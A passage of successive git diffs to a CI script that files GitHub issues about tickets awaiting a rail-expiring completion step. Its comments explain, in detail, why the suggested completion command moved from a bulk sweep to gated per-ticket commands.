-// end-to-end test in scripts/test/ceremony-drift-exit.test.mjs.
-const CEREMONY_CMD =
-  'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main';
+// `adlc-tickets complete <id> --write --authorize` goes through TicketService's
+// transaction: it completes exactly the named ticket, validates the expected
+// snapshot (CAS), holds the worktree lock, journals, and records completion
+// evidence to `.adlc/manifest.jsonl`. It works identically on the tickets.json
+// and directory backends (verified on both).
+//
+// This replaces two earlier remedies, and fixes what each got wrong:
+//   - the bulk `ticket-prune --ceremony`, which recomputed its own target set at
+//     run time (no ids, no revision) — so a ticket that landed after this issue
+//     was reviewed could be swept in (a TOCTOU window), and it had no per-ticket
+//     filter (one heuristic entry tainted the whole set);
+//   - the directory-store raw-edit ("add completed:true to each shard"), which
+//     bypassed the lock, CAS, journal, and manifest evidence the directory
+//     contract requires, and was not "the same minimal diff" it claimed to be.
+//
+// A per-ticket command is bound to one id, so neither problem exists: no
+// recomputation, no blast radius, and the write goes through the canonical path.
+const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize`;
 
 /**
  * Render the tracking-issue body. Deterministic: entries are sorted by id, so an
@@ -67,7 +73,7 @@ const CEREMONY_CMD =
  * compare bodies to decide whether anything actually changed.
  * @param {{id?: string, reason?: string, rails?: string[], blocker?: string}[]} needsCeremony
  */
-export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTicketUnknown = false, ceremonySupported = true } = {}) {
+export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTicketUnknown = false } = {}) {
   const entries = [...(needsCeremony ?? [])].sort((a, b) =>
     String(a?.id ?? '').localeCompare(String(b?.id ?? ''))
   );
@@ -120,29 +126,20 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const confirmed = railsFreeze.filter((t) => !isActive(t) && isConfirmedDone(t));
   const unconfirmed = railsFreeze.filter((t) => !isActive(t) && !isConfirmedDone(t));
 
-  // Whether the MUTATING bulk command may appear at all. This is evidence-gated,
-  // not certification: it renders only when every rail-freezing entry carries an
-  // explicit done-status. Heuristic entries (`inferred:` — scope globs already
-  // resolve, indistinguishable from an active ticket touching existing files)
-  // must NOT get a copy-pasteable rail-expiring command, because in CI the
-  // active-ticket quarantine cannot fire (the pointer is gitignored) and a
-  // warning is not an enforced invariant.
+  // A ready-to-run completion command is offered ONLY for confirmed entries —
+  // rail-freezing tickets that carry an explicit done-status and are not the
+  // active ticket. Because each command names one id, a heuristic or active entry
+  // elsewhere in the set cannot be swept in: there is no all-or-nothing gate to
+  // get wrong. Heuristic entries (`inferred:` — scope already resolves,
+  // indistinguishable from an active ticket editing existing files) simply do not
+  // get a ready command; they are listed under "Needs confirmation" with the
+  // generic form, to be run only after a human verifies each one.
   //
-  // This is deliberately distinct from the `bulkIsSafe` check removed earlier:
-  // that one relied on the active-ticket pointer, which CI cannot see. This one
-  // relies only on the ticket's own committed `status` field, which is visible in
-  // every checkout. `activeEntries === 0` stays as defense-in-depth for local
-  // runs where the pointer IS present; it is a bonus, never the load-bearing
-  // signal. The dry-run command below is always shown regardless — it is
-  // read-only and cannot expire a rail.
-  //
-  // The residual TIME window (a ticket added after this render enters the
-  // command's set — the command takes no IDs and recomputes) is NOT closed here;
-  // that needs a revision-bound, per-ticket ceremony in ticket-prune (explicit
-  // IDs + expected HEAD), a CLI contract change tracked separately. The dry-run
-  // is the operator's guard against it in the meantime.
-  const mutatingCommandAllowed =
-    confirmed.length > 0 && unconfirmed.length === 0 && activeEntries.length === 0;
+  // `confirmed` is derived from the ticket's committed `status` field, visible in
+  // every checkout — NOT from the active-ticket pointer, which a CI checkout
+  // cannot see (it is gitignored). That distinction is why the earlier
+  // pointer-dependent gate was unsound and this is not.
+  const completable = confirmed; // already: rail-freezing, explicit-done, not active
 
   // WHY THIS REPORT NEVER CERTIFIES THE COMMAND AS SAFE TO RUN
   //
@@ -254,70 +251,56 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
     );
   }
 
-  // Rendered whenever there is anything the ceremony could act on. It is a
-  // PROCEDURE with preconditions, never a vetted one-liner: see the "never
-  // certifies" note above for why this job cannot vouch for it.
-  //
-  // On a DIRECTORY-backed store the automated ceremony does not exist yet —
-  // run.mjs returns "not supported for the directory ticket store yet" — so
-  // publishing the command there would send an operator to a deterministic
-  // error and leave the rails frozen. Detection happens in main(); this renders
-  // the backend-appropriate remedy.
+  // A PROCEDURE with preconditions, never a vetted one-liner: see the "never
+  // certifies" note above. The remedy is the same on both backends — the
+  // canonical per-ticket completion works identically on tickets.json and the
+  // directory store — so there is no backend branch here.
   const procedure = !railsFreeze.length
     ? []
-    : !ceremonySupported
-    ? [
-        '## Clearing these',
-        '',
-        '> This repository uses the **directory ticket store** (`.adlc/tickets/`),',
-        '> for which `ticket-prune --ceremony` is not implemented yet — it exits with',
-        '> "not supported for the directory ticket store yet". No command is offered',
-        '> here because the one that exists would fail.',
-        '',
-        'Complete these tickets through the protected-base admin path directly:',
-        'add `completed: true` to each ticket listed above (an add-only edit, the same',
-        'minimal diff the ceremony would produce) and land it on `main` the way other',
-        'protected-base ticket changes are landed. Completing a ticket expires its',
-        'rails, so confirm each is genuinely finished first.',
-        '',
-      ]
     : [
         '## Clearing these',
         '',
-        '> **This check runs in CI and cannot tell you it is safe to run the command',
-        '> below.** Two things it cannot see: any ticket added since this issue was',
-        '> last updated (the command re-computes its own target set when you run it,',
-        '> and takes no ticket IDs), and whether a ticket is actively being built —',
-        '> `.adlc/current-ticket.json` is gitignored, so a CI checkout never has one',
-        '> and an empty checkout looks identical to "nothing in progress".',
+        '> **Protected-base admin action.** Completing a rail-freezing ticket expires',
+        "> its rails, and rails-guard-ci denies that diff on an ordinary PR, so these",
+        '> land on `main` the way other protected-base ticket changes do.',
+        '>',
+        '> **This check runs in CI and cannot see whether a ticket is still being',
+        "> built** — `.adlc/current-ticket.json` is gitignored, so a CI checkout never",
+        '> has one and an empty checkout looks identical to "nothing in progress".',
+        '> Run the review from a checkout where your active-ticket pointer lives, and',
+        '> confirm each id is genuinely finished before completing it.',
         '',
-        'Run the dry run first, from an up-to-date `main` checkout on the machine',
-        'where your active-ticket pointer lives, and confirm the listed set is what',
-        'you expect **now**:',
+        'Review the current drift set (read-only — expires no rails):',
         '',
         '```bash',
-        'adlc ticket-prune --base-ref origin/main        # dry run: review the set',
-        ...(mutatingCommandAllowed ? [CEREMONY_CMD] : []),
+        DRY_RUN_CMD,
         '```',
         '',
-        ...(mutatingCommandAllowed
+        ...(completable.length
           ? [
-              'Every rail-freezing entry here carries an explicit done-status, so the',
-              'completion command is shown. Completing a ticket expires its rails; if the',
-              'dry run names anything still in flight, complete the finished tickets',
-              'individually instead — the bulk command has no per-ticket filter.',
+              'Complete each finished ticket individually. Each command below is bound to',
+              "one id, goes through the store's transaction (lock + expected-snapshot",
+              'check), and records completion evidence to `.adlc/manifest.jsonl` — it',
+              'completes exactly that ticket and nothing else:',
+              '',
+              '```bash',
+              ...completable.map((t) => completeCmd(t.id)),
+              '```',
+              '',
             ]
-          : [
-              '**No completion command is shown.** At least one rail-freezing entry above',
-              'was inferred shipped only because its scope already resolves to tracked',
-              'files — which is exactly what an active ticket editing existing files looks',
-              'like — so there is no authoritative signal it is finished. Give each',
-              'genuinely-done ticket an explicit done-`status` (it then moves to the',
-              '"Explicitly done" section and the command appears), or complete them one at',
-              'a time via the protected-base path. The bulk command would complete every',
-              'rail-freezing ticket it finds, including any still in flight.',
-            ]),
-        '',
+          : []),
+        ...(unconfirmed.length
+          ? [
+              (completable.length ? 'The' : 'No ready command is offered: the') +
+                ` ${unconfirmed.length} ticket(s) under "Needs confirmation" were inferred` +
+                ' shipped only because their scope already resolves to tracked files —',
+              'indistinguishable from an active ticket editing existing files. Give each',
+              'genuinely-done ticket an explicit done-`status` so it appears above, or, once',
+              'you have verified one by hand, complete just that id:',
+              '`adlc-tickets complete <id> --write --authorize`.',
+              '',
+            ]
+          : []),
       ];
 
   return [
@@ -395,7 +378,7 @@ export function selectTrackingIssue(issues, { authors = null, requireMarker = tr
  * and close-on-clear contracts are testable without a GitHub token.
  * @param {{drift: object[], existingIssue: {number: number, title: string, body: string} | null}} input
  */
-export function decideAction({ drift, existingIssue, activeTicketId = null, activeTicketUnknown = false, ceremonySupported = true }) {
+export function decideAction({ drift, existingIssue, activeTicketId = null, activeTicketUnknown = false }) {
   const entries = drift ?? [];
 
   if (entries.length === 0) {
@@ -405,7 +388,7 @@ export function decideAction({ drift, existingIssue, activeTicketId = null, acti
   }
 
   const title = renderIssueTitle(entries);
-  const body = renderIssueBody(entries, { activeTicketId, activeTicketUnknown, ceremonySupported });
+  const body = renderIssueBody(entries, { activeTicketId, activeTicketUnknown });
 
   if (!existingIssue) return { action: 'open', title, body };
 
@@ -519,13 +502,6 @@ async function main() {
   // a malformed or conflicting pointer comes back as ok:false (the fail-closed
   // contract from #196). Reading it as a bare id yields an object, which would
   // never equal a ticket id and would silently disable the exclusion entirely.
-  // Same signal the Claude Code hook uses to detect the backend. The directory
-  // store has no ceremony implementation yet (run.mjs), so the remedy differs.
-  const ceremonySupported = !existsSync(join(process.cwd(), '.adlc', 'tickets', '.store.json'));
-  if (!ceremonySupported) {
-    console.log('ceremony-drift: directory ticket store detected — ceremony command not applicable');
-  }
-
   const resolvedActive = resolveActiveTicketId({ root: process.cwd() });
   const activeTicketUnknown = !resolvedActive.ok;
   const activeTicketId = resolvedActive.ok ? (resolvedActive.value?.id ?? null) : null;
@@ -547,7 +523,7 @@ async function main() {
   }
 
   ensureLabel();
-  const decision = decideAction({ drift, existingIssue: findExistingIssue(), activeTicketId, activeTicketUnknown, ceremonySupported });
+  const decision = decideAction({ drift, existingIssue: findExistingIssue(), activeTicketId, activeTicketUnknown });
   switch (decision.action) {
     case 'open': {
       const url = gh(['issue', 'create', '--title', decision.title, '--label', LABEL, '--body-file', '-'], decision.body).trim();

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -27,6 +27,8 @@
 // the issue untouched, or the signal becomes noise and gets muted.
 
 import { execFileSync } from 'node:child_process';
+import { existsSync } from 'node:fs';
+import { join } from 'node:path';
 import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
 import { resolveActiveTicketId } from '../packages/tickets/lib/pointer.mjs';
 
@@ -65,7 +67,7 @@ const CEREMONY_CMD =
  * compare bodies to decide whether anything actually changed.
  * @param {{id?: string, reason?: string, rails?: string[], blocker?: string}[]} needsCeremony
  */
-export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTicketUnknown = false } = {}) {
+export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTicketUnknown = false, ceremonySupported = true } = {}) {
   const entries = [...(needsCeremony ?? [])].sort((a, b) =>
     String(a?.id ?? '').localeCompare(String(b?.id ?? ''))
   );
@@ -231,8 +233,31 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   // Rendered whenever there is anything the ceremony could act on. It is a
   // PROCEDURE with preconditions, never a vetted one-liner: see the "never
   // certifies" note above for why this job cannot vouch for it.
-  const procedure = railsFreeze.length
+  //
+  // On a DIRECTORY-backed store the automated ceremony does not exist yet —
+  // run.mjs returns "not supported for the directory ticket store yet" — so
+  // publishing the command there would send an operator to a deterministic
+  // error and leave the rails frozen. Detection happens in main(); this renders
+  // the backend-appropriate remedy.
+  const procedure = !railsFreeze.length
+    ? []
+    : !ceremonySupported
     ? [
+        '## Clearing these',
+        '',
+        '> This repository uses the **directory ticket store** (`.adlc/tickets/`),',
+        '> for which `ticket-prune --ceremony` is not implemented yet — it exits with',
+        '> "not supported for the directory ticket store yet". No command is offered',
+        '> here because the one that exists would fail.',
+        '',
+        'Complete these tickets through the protected-base admin path directly:',
+        'add `completed: true` to each ticket listed above (an add-only edit, the same',
+        'minimal diff the ceremony would produce) and land it on `main` the way other',
+        'protected-base ticket changes are landed. Completing a ticket expires its',
+        'rails, so confirm each is genuinely finished first.',
+        '',
+      ]
+    : [
         '## Clearing these',
         '',
         '> **This check runs in CI and cannot tell you it is safe to run the command',
@@ -255,8 +280,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
         'in flight, complete the finished tickets individually instead — the bulk',
         'command has no per-ticket filter.',
         '',
-      ]
-    : [];
+      ];
 
   return [
     MARKER,
@@ -333,7 +357,7 @@ export function selectTrackingIssue(issues, { authors = null, requireMarker = tr
  * and close-on-clear contracts are testable without a GitHub token.
  * @param {{drift: object[], existingIssue: {number: number, title: string, body: string} | null}} input
  */
-export function decideAction({ drift, existingIssue, activeTicketId = null, activeTicketUnknown = false }) {
+export function decideAction({ drift, existingIssue, activeTicketId = null, activeTicketUnknown = false, ceremonySupported = true }) {
   const entries = drift ?? [];
 
   if (entries.length === 0) {
@@ -343,7 +367,7 @@ export function decideAction({ drift, existingIssue, activeTicketId = null, acti
   }
 
   const title = renderIssueTitle(entries);
-  const body = renderIssueBody(entries, { activeTicketId, activeTicketUnknown });
+  const body = renderIssueBody(entries, { activeTicketId, activeTicketUnknown, ceremonySupported });
 
   if (!existingIssue) return { action: 'open', title, body };
 
@@ -358,7 +382,7 @@ export function decideAction({ drift, existingIssue, activeTicketId = null, acti
 // ---- I/O shell (deliberately branch-free; all decisions live above) ----
 
 const gh = (args, input) =>
-  execFileSync('gh', args, { encoding: 'utf8', input, maxBuffer: 10 * 1024 * 1024 });
+  execFileSync('gh', args, { encoding: 'utf8', input, maxBuffer: GH_MAX_BUFFER });
 
 /** Idempotent; --force makes re-creating an existing label a no-op. */
 function ensureLabel() {
@@ -370,6 +394,10 @@ function ensureLabel() {
 // for this repo; if it is ever hit, the labeled lookup above is the load-bearing
 // path anyway.
 const SWEEP_LIMIT = 1000;
+
+// Issue bodies are unbounded; 1000 of them can exceed a default buffer and make
+// every run fail. Generous, and paired with the truncation warning below.
+const GH_MAX_BUFFER = 128 * 1024 * 1024;
 
 // Applying the label requires write access, so a labeled issue is already an
 // authorization signal. The unlabeled sweep has no such signal and must verify
@@ -396,12 +424,23 @@ function findExistingIssue() {
   // open a duplicate (active drift) or never close the stale issue (cleared
   // drift). The marker is the durable identity, so sweep open issues for it —
   // but only accept one this job could have authored (the marker is public).
-  const unlabeled = selectTrackingIssue(
-    JSON.parse(gh(['issue', 'list', '--state', 'open', '--limit', String(SWEEP_LIMIT),
-      '--json', ISSUE_FIELDS])),
-    { authors: MANAGED_AUTHORS }
-  );
-  if (!unlabeled) return null;
+  const swept = JSON.parse(gh(['issue', 'list', '--state', 'open', '--limit', String(SWEEP_LIMIT),
+    '--json', ISSUE_FIELDS]));
+  const unlabeled = selectTrackingIssue(swept, { authors: MANAGED_AUTHORS });
+
+  if (!unlabeled) {
+    // NO SILENT CAP. If the scan filled its window, an older unlabeled tracker
+    // may exist beyond it — in which case a duplicate is about to be opened, or a
+    // stale one left open. Say so rather than reporting a clean "not found".
+    if (swept.length >= SWEEP_LIMIT) {
+      console.log(
+        `ceremony-drift: WARNING — scanned the ${SWEEP_LIMIT} most recent open issues and did ` +
+          `not find a marked tracker; an older unlabeled one may exist beyond that window. ` +
+          `Re-apply the '${LABEL}' label to it to restore the fast path.`
+      );
+    }
+    return null;
+  }
 
   // Self-heal so the fast path works again next run.
   gh(['issue', 'edit', String(unlabeled.number), '--add-label', LABEL]);
@@ -433,6 +472,13 @@ async function main() {
   // a malformed or conflicting pointer comes back as ok:false (the fail-closed
   // contract from #196). Reading it as a bare id yields an object, which would
   // never equal a ticket id and would silently disable the exclusion entirely.
+  // Same signal the Claude Code hook uses to detect the backend. The directory
+  // store has no ceremony implementation yet (run.mjs), so the remedy differs.
+  const ceremonySupported = !existsSync(join(process.cwd(), '.adlc', 'tickets', '.store.json'));
+  if (!ceremonySupported) {
+    console.log('ceremony-drift: directory ticket store detected — ceremony command not applicable');
+  }
+
   const resolvedActive = resolveActiveTicketId({ root: process.cwd() });
   const activeTicketUnknown = !resolvedActive.ok;
   const activeTicketId = resolvedActive.ok ? (resolvedActive.value?.id ?? null) : null;
@@ -454,7 +500,7 @@ async function main() {
   }
 
   ensureLabel();
-  const decision = decideAction({ drift, existingIssue: findExistingIssue(), activeTicketId, activeTicketUnknown });
+  const decision = decideAction({ drift, existingIssue: findExistingIssue(), activeTicketId, activeTicketUnknown, ceremonySupported });
   switch (decision.action) {
     case 'open': {
       const url = gh(['issue', 'create', '--title', decision.title, '--label', LABEL, '--body-file', '-'], decision.body).trim();

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -28,6 +28,7 @@
 
 import { execFileSync } from 'node:child_process';
 import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
+import { resolveActiveTicketId } from '../packages/tickets/lib/pointer.mjs';
 
 // The DURABLE identity of the managed issue. Labels can be stripped by hand; the
 // marker survives in the body, and findExistingIssue falls back to sweeping open
@@ -51,7 +52,7 @@ const CEREMONY_CMD =
  * compare bodies to decide whether anything actually changed.
  * @param {{id?: string, reason?: string, rails?: string[], blocker?: string}[]} needsCeremony
  */
-export function renderIssueBody(needsCeremony) {
+export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTicketUnknown = false } = {}) {
   const entries = [...(needsCeremony ?? [])].sort((a, b) =>
     String(a?.id ?? '').localeCompare(String(b?.id ?? ''))
   );
@@ -80,15 +81,64 @@ export function renderIssueBody(needsCeremony) {
   const railsFreeze = entries.filter((t) => t?.blocker === 'rails-freeze');
   const manual = entries.filter((t) => t?.blocker !== 'rails-freeze');
 
+  // EVIDENCE STRENGTH decides what may be advertised as a bulk action.
+  //
+  // classifyTicket() reports two very different things under one `stale` flag:
+  //   explicit status: "done"  -> the ticket SAYS it is finished. Authoritative.
+  //   inferred: all N scope glob(s) resolve to tracked files on the base ref
+  //                            -> a HEURISTIC. It is also exactly what an ACTIVE
+  //                               ticket looks like when its work touches paths
+  //                               that already exist, which is the common case.
+  //
+  // Completing a ticket expires its rails. Advertising a one-line bulk command
+  // over heuristic evidence therefore invites an operator to disable rail
+  // protection on work that is still in flight — and an issue filed by a bot
+  // carries more apparent authority than a CLI someone chose to run.
+  //
+  // So this is an ALLOW-LIST: only an explicit done-status earns the bulk
+  // command. Inferred, missing, malformed, or unrecognized evidence all fall to
+  // "needs confirmation". Keying off `inferred:` instead would mean a renamed
+  // reason string, or an absent one, silently promotes a ticket into the
+  // rail-expiring instruction — failing OPEN on the one decision here that can
+  // destroy in-flight protection.
+  //
+  // And if the active-ticket pointer could not be resolved at all, nothing is
+  // clearable: we cannot say which ticket is in flight, so we cannot say which
+  // one the command would wrongly complete.
+  const isConfirmedDone = (t) =>
+    !activeTicketUnknown && String(t?.reason ?? '').startsWith('explicit status:');
+  const isActive = (t) => activeTicketId != null && t?.id === activeTicketId;
+
+  const activeEntries = railsFreeze.filter(isActive);
+  const confirmed = railsFreeze.filter((t) => !isActive(t) && isConfirmedDone(t));
+  const unconfirmed = railsFreeze.filter((t) => !isActive(t) && !isConfirmedDone(t));
+
   const sections = [];
 
-  if (railsFreeze.length) {
+  if (activeEntries.length) {
     sections.push(
-      `## Clearable by the ceremony (${railsFreeze.length})`,
+      `## ⚠ Currently active — do NOT complete (${activeEntries.length})`,
       '',
-      'These have shipped but are still active and still freezing rails. Under T36 a',
-      "ticket's rails expire only when it is marked `completed: true`, so until then",
-      'they keep freezing paths for unrelated future work.',
+      'The active-ticket pointer names this ticket, so work on it is presumably in',
+      'flight. It appears here only because its declared scope already resolves to',
+      'tracked files, which is what in-progress work on existing paths looks like.',
+      '',
+      '**Completing it would expire its rails while it is still being built.** It is',
+      'excluded from the command below. If it genuinely is finished, complete it on',
+      'its own after clearing the active-ticket pointer.',
+      '',
+      ...rowsFor(activeEntries),
+      ''
+    );
+  }
+
+  if (confirmed.length) {
+    sections.push(
+      `## Confirmed shipped — clearable by the ceremony (${confirmed.length})`,
+      '',
+      'These carry an explicit done-shaped `status`, so the ticket itself asserts it',
+      'is finished. Under T36 rails expire only once a ticket is marked `completed: true`,',
+      'so until then they keep freezing paths for unrelated work.',
       '',
       '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
       'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
@@ -98,9 +148,36 @@ export function renderIssueBody(needsCeremony) {
       CEREMONY_CMD,
       '```',
       '',
-      'Review the diff before pushing — it completes every ticket in *this* section.',
+      '> The command completes **every** rail-freezing ticket it finds, including any',
+      '> listed under "Needs confirmation" below. Review the diff before pushing.',
       '',
-      ...rowsFor(railsFreeze),
+      ...rowsFor(confirmed),
+      ''
+    );
+  }
+
+  if (unconfirmed.length) {
+    sections.push(
+      `## Needs confirmation before completing (${unconfirmed.length})`,
+      '',
+      'These have **no explicit done-status**. Most were inferred shipped only',
+      'because every declared scope glob already resolves to a tracked file — which',
+      'is equally true of an active ticket whose work touches existing paths. That',
+      'evidence cannot distinguish "finished" from "in progress on existing files".',
+      'Entries whose evidence could not be read at all land here too, deliberately.',
+      ...(activeTicketUnknown
+        ? ['',
+           '> The active-ticket pointer could not be resolved on this run, so **every**',
+           '> entry is listed here: without knowing which ticket is in flight, none can',
+           '> be advertised as safe to bulk-complete.']
+        : []),
+      '',
+      'Completing a ticket expires its rails, so confirm each one is genuinely done',
+      'before including it. The ceremony command has no per-ticket filter: if any of',
+      'these is not finished, give it an explicit status (or complete the others',
+      'individually) rather than running the bulk command.',
+      '',
+      ...rowsFor(unconfirmed),
       ''
     );
   }
@@ -155,10 +232,17 @@ export function renderIssueTitle(needsCeremony) {
  * not guaranteed) rather than throwing mid-run.
  * @param {{number: number, title?: string, body?: unknown}[]} issues
  */
-export function selectTrackingIssue(issues, { authors = null } = {}) {
-  let candidates = (issues ?? []).filter(
-    (i) => typeof i?.body === 'string' && i.body.includes(MARKER)
-  );
+export function selectTrackingIssue(issues, { authors = null, requireMarker = true } = {}) {
+  // The marker is the identity on the UNLABELED sweep, where nothing else
+  // distinguishes this job's issue. On the labeled path it must NOT be required:
+  // a maintainer editing the body can delete the invisible comment while leaving
+  // the label intact, and demanding the marker there would orphan a correctly
+  // labeled tracker — opening a duplicate under drift, or never closing it once
+  // drift clears. The canonical body (marker included) is restored on the next
+  // update, which is what the footer promises.
+  let candidates = requireMarker
+    ? (issues ?? []).filter((i) => typeof i?.body === 'string' && i.body.includes(MARKER))
+    : [...(issues ?? [])].filter(Boolean);
 
   // AUTHORIZATION. The marker is public: it is visible in the rendered issue and
   // trivially copied. Treating "body contains the marker" as authority to seize
@@ -188,7 +272,7 @@ export function selectTrackingIssue(issues, { authors = null } = {}) {
  * and close-on-clear contracts are testable without a GitHub token.
  * @param {{drift: object[], existingIssue: {number: number, title: string, body: string} | null}} input
  */
-export function decideAction({ drift, existingIssue }) {
+export function decideAction({ drift, existingIssue, activeTicketId = null, activeTicketUnknown = false }) {
   const entries = drift ?? [];
 
   if (entries.length === 0) {
@@ -198,7 +282,7 @@ export function decideAction({ drift, existingIssue }) {
   }
 
   const title = renderIssueTitle(entries);
-  const body = renderIssueBody(entries);
+  const body = renderIssueBody(entries, { activeTicketId, activeTicketUnknown });
 
   if (!existingIssue) return { action: 'open', title, body };
 
@@ -242,7 +326,8 @@ function findExistingIssue() {
   // and stays deterministic no matter how large the repo gets.
   const labeled = selectTrackingIssue(
     JSON.parse(gh(['issue', 'list', '--state', 'open', '--label', LABEL, '--limit', '100',
-      '--json', ISSUE_FIELDS]))
+      '--json', ISSUE_FIELDS])),
+    { authors: MANAGED_AUTHORS, requireMarker: false }
   );
   if (labeled) return labeled;
 
@@ -277,13 +362,38 @@ async function main() {
   console.log(`ceremony-drift: ${drift.length} ticket(s) awaiting the completion ceremony`);
   for (const t of drift) console.log(`  - ${t.id} (${t.blocker})`);
 
+  // Resolved BEFORE the dry-run return, so a dry run previews the most
+  // safety-relevant fact rather than hiding it: which ticket is excluded from
+  // bulk-completion advice because completing it would expire the rails of work
+  // still in flight. If the pointer cannot be read the design still degrades
+  // safely — without an explicit done-status a ticket lands in "needs
+  // confirmation", which never advertises the bulk command.
+  // resolveActiveTicketId returns a RESULT ({ok, value}) and does not throw —
+  // a malformed or conflicting pointer comes back as ok:false (the fail-closed
+  // contract from #196). Reading it as a bare id yields an object, which would
+  // never equal a ticket id and would silently disable the exclusion entirely.
+  const resolvedActive = resolveActiveTicketId({ root: process.cwd() });
+  const activeTicketUnknown = !resolvedActive.ok;
+  const activeTicketId = resolvedActive.ok ? (resolvedActive.value?.id ?? null) : null;
+
+  if (activeTicketUnknown) {
+    // We cannot tell which ticket is in flight, so we cannot tell which one the
+    // bulk command would wrongly complete. Suppress that advice entirely.
+    console.log(
+      `ceremony-drift: active-ticket pointer unresolvable (${resolvedActive.code ?? 'error'}); ` +
+        `suppressing bulk-completion advice`
+    );
+  } else if (activeTicketId) {
+    console.log(`ceremony-drift: active ticket is ${activeTicketId} (excluded from bulk advice)`);
+  }
+
   if (process.env.DRY_RUN === '1') {
     console.log(`ceremony-drift: DRY_RUN=1, no issue changes`);
     return;
   }
 
   ensureLabel();
-  const decision = decideAction({ drift, existingIssue: findExistingIssue() });
+  const decision = decideAction({ drift, existingIssue: findExistingIssue(), activeTicketId, activeTicketUnknown });
   switch (decision.action) {
     case 'open': {
       const url = gh(['issue', 'create', '--title', decision.title, '--label', LABEL, '--body-file', '-'], decision.body).trim();

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -113,6 +113,16 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const confirmed = railsFreeze.filter((t) => !isActive(t) && isConfirmedDone(t));
   const unconfirmed = railsFreeze.filter((t) => !isActive(t) && !isConfirmedDone(t));
 
+  // The command may be shown ONLY when every rail-freezing entry is confirmed.
+  //
+  // `ticket-prune --ceremony` has no per-ticket filter: it completes EVERY stale
+  // rail-freezing ticket it finds. Splitting the report into sections therefore
+  // partitions the DISPLAY, not the command's effect. Rendering it beside an
+  // active or unconfirmed entry — under a heading saying that entry is excluded —
+  // would be a false safety claim an operator acts on, completing in-flight work
+  // and expiring its rails. Sectioning is presentation; this is the safety gate.
+  const bulkIsSafe = confirmed.length > 0 && activeEntries.length === 0 && unconfirmed.length === 0;
+
   const sections = [];
 
   if (activeEntries.length) {
@@ -123,9 +133,12 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
       'flight. It appears here only because its declared scope already resolves to',
       'tracked files, which is what in-progress work on existing paths looks like.',
       '',
-      '**Completing it would expire its rails while it is still being built.** It is',
-      'excluded from the command below. If it genuinely is finished, complete it on',
-      'its own after clearing the active-ticket pointer.',
+      '**Completing it would expire its rails while it is still being built.**',
+      '',
+      'Because the ceremony command has no per-ticket filter — it completes every',
+      'stale rail-freezing ticket it finds — no bulk command is offered while this',
+      'ticket is listed. If it genuinely is finished, clear the active-ticket',
+      'pointer first, then re-run this check.',
       '',
       ...rowsFor(activeEntries),
       ''
@@ -142,14 +155,22 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
       '',
       '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
       'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
-      'is reserved for the protected-base admin ceremony:',
+      'is reserved for the protected-base admin ceremony.',
       '',
-      '```bash',
-      CEREMONY_CMD,
-      '```',
-      '',
-      '> The command completes **every** rail-freezing ticket it finds, including any',
-      '> listed under "Needs confirmation" below. Review the diff before pushing.',
+      ...(bulkIsSafe
+        ? ['Every rail-freezing entry below is confirmed done, so the bulk command is',
+           'safe to run as-is:',
+           '',
+           '```bash',
+           CEREMONY_CMD,
+           '```',
+           '',
+           'Review the diff before pushing.']
+        : ['> **No bulk command is offered on this run.** `ticket-prune --ceremony` has',
+           '> no per-ticket filter — it completes *every* stale rail-freezing ticket,',
+           '> which would include the entries listed in the other sections. Resolve',
+           '> those first (or complete these individually via the protected-base path),',
+           '> then re-run this check.']),
       '',
       ...rowsFor(confirmed),
       ''

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -48,11 +48,10 @@ const DRY_RUN_CMD = 'adlc ticket-prune --base-ref origin/main        # dry run: 
 
 // The completion command is PER-TICKET and canonical, not a bulk sweep.
 //
-// `adlc-tickets complete <id> --write --authorize` goes through TicketService's
-// transaction: it completes exactly the named ticket, validates the expected
-// snapshot (CAS), holds the worktree lock, journals, and records completion
-// evidence to `.adlc/manifest.jsonl`. It works identically on the tickets.json
-// and directory backends (verified on both).
+// `adlc-tickets complete <id> --write --authorize --json` goes through
+// TicketService's transaction: it completes exactly the named ticket, validates
+// the expected snapshot (CAS), holds the worktree lock, journals, and records
+// completion evidence to `.adlc/manifest.jsonl`. Works on both backends.
 //
 // This replaces two earlier remedies, and fixes what each got wrong:
 //   - the bulk `ticket-prune --ceremony`, which recomputed its own target set at
@@ -63,9 +62,27 @@ const DRY_RUN_CMD = 'adlc ticket-prune --base-ref origin/main        # dry run: 
 //     bypassed the lock, CAS, journal, and manifest evidence the directory
 //     contract requires, and was not "the same minimal diff" it claimed to be.
 //
-// A per-ticket command is bound to one id, so neither problem exists: no
-// recomputation, no blast radius, and the write goes through the canonical path.
-const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize`;
+// `--json` is REQUIRED, not cosmetic: on a legacy store the CLI otherwise offers
+// an interactive migration before mutating (offerLegacyMigration, gated on a TTY
+// and `!--json`). An admin who accepted that prompt would migrate the WHOLE store
+// before completing one ticket — a repo-wide change outside the reviewed diff.
+// `--json` makes the command non-interactive, so it does exactly what is
+// advertised: complete one ticket, nothing else.
+const completeCmd = (id) => `adlc-tickets complete ${id} --write --authorize --json`;
+
+// A ticket id is interpolated into a copy-paste shell command in a bot-authored
+// issue. The id comes from the repo (a merged ticket), and the store validator
